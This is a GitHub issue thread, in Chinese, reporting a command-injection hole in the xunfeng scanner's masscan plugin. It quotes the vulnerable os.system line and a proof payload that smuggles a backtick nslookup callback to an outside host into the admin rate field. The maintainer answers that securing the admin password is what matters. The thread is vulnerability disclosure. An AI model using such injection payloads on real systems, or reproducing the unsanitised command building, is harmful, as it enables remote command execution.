### ISSUE TITLE
后台命令执行漏洞

### ISSUE THREAD

**Issue by LandGrey** [ysrc/xunfeng#134]
出问题的代码在 xunfeng/nascan/plugin/masscan.py 文件;   
  只过滤了;|&三个特殊字符，就拼接到了命令中:
```
os.system("%s -p1-65535 -iL target.log -oL tmp.log --randomize-hosts --rate=%s"%(path,rate))
```
  Linux平台下，启用masscan，在后台masscan的速率配置框中填入
```
20000`nslookup test.my.logeyes.me`
```
命令执行

**Comment by ywolf** [comment]
确实存在这个问题，但因为后台本身的增加插件功能就能自定义执行代码，所以改动这个也无济于事的，关键还是把后台密码保护好。
